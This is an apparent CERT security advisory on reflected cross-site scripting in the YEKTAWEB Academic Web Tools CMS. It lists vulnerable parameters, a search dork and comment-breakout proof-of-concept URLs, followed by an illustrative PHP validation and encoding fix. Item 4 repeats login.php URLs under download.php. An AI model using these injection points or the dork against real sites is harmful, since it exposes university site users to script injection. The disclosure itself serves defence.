============================================ IUT-CERT ============================================

Title: Academic Web Tools CMS Multiple XSS
Vendor: www.yektaweb.com
Vulnerable Version: 1.5.7 and prior
Type: XSS
Fix: N/A
Dork: AWT YEKTA

============================================ nsec.ir ============================================

Description:
------------------

YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university
affairs such as conferences and journals.
The built-in filter of this package cannot prevent XSS attacks through some parameters.


Vulnerabilities:
------------------

1- Cross Site Scripting (XSS) in "/page.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/page.php?sid=[XSS]
http://yoursite/page.php?logincase=[XSS]
http://yoursite/page.php?redirect=[XSS]

2- Cross Site Scripting (XSS) in "/page_arch.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/page_arch.php?sid=[XSS]
http://yoursite/page_arch.php?logincase=[XSS]
http://yoursite/page_arch.php?redirect=[XSS]

3- Cross Site Scripting (XSS) in "/login.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]

4- Cross Site Scripting (XSS) in "/download.php" in the "sid", "logincase" and "redirect" parameters.
http://yoursite/login.php?sid=[XSS]
http://yoursite/login.php?logincase=[XSS]
http://yoursite/login.php?redirect=[XSS]


Exploit/PoC:
------------------

Example:
http://yoursite/login.php?slct_pg_id=53&sid=1*/-->&slc_lang=fa
http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/-->
http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/-->


Solution:
------------------

The input validation filter should be patched: each of the three parameters should be validated against the type it actually carries, and every reflected value should be output-encoded for the HTML context it lands in (the "*/-->" PoC values break out of a comment context, which a filter that only strips tags does not catch).
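As an added illustration of that fix (this is not the vendor's code; the function names, the allowed logincase values and the output markup are assumptions), the following PHP treats sid as a numeric identifier, logincase as an allow-listed selector and redirect as a same-site relative path, and HTML-encodes anything it reflects:

```php
<?php
// Added example, not YEKTAWEB code. Function names are hypothetical.

// sid is a record identifier: accept only a short positive integer.
// $raw may be a string, null, or an array (?sid[]=...), so check the type.
function sanitize_sid($raw): ?int {
    if (!is_string($raw) || !preg_match('/^\d{1,10}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// logincase selects one of a fixed set of login flows: use an allow-list.
// The set below is constructed for the example, not taken from the product.
function sanitize_logincase($raw): string {
    $allowed = ['login', 'logout', 'forgot'];
    return (is_string($raw) && in_array($raw, $allowed, true)) ? $raw : 'login';
}

// redirect must stay on this site: permit only a relative path made of a
// conservative character set, reject protocol-relative "//host" forms,
// and fall back to the front page on anything else.
function sanitize_redirect($raw): string {
    if (!is_string($raw) || $raw === '' ) {
        return '/';
    }
    if (substr($raw, 0, 2) === '//' || !preg_match('~^/[A-Za-z0-9_./?=&%-]*$~', $raw)) {
        return '/';
    }
    return $raw;
}

// Encode for an HTML attribute/text context; do this at output time,
// never rely on the input filter alone.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$sid       = sanitize_sid($_GET['sid'] ?? null);
$logincase = sanitize_logincase($_GET['logincase'] ?? null);
$redirect  = sanitize_redirect($_GET['redirect'] ?? null);

if ($sid === null) {
    http_response_code(400);
    exit('invalid sid');
}
?>
<!-- $sid is an int, so it cannot carry markup; the others are encoded. -->
<input type="hidden" name="sid" value="<?= $sid ?>">
<input type="hidden" name="logincase" value="<?= h($logincase) ?>">
<a href="<?= h($redirect) ?>">Continue</a>
```

With this in place the PoC values from the advisory (sid=1*/-->, logincase=*/-->, redirect=*/-->) are rejected or replaced by defaults before they ever reach the page, and anything that is reflected is encoded for the context it is written into.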


Credit:
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to: M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari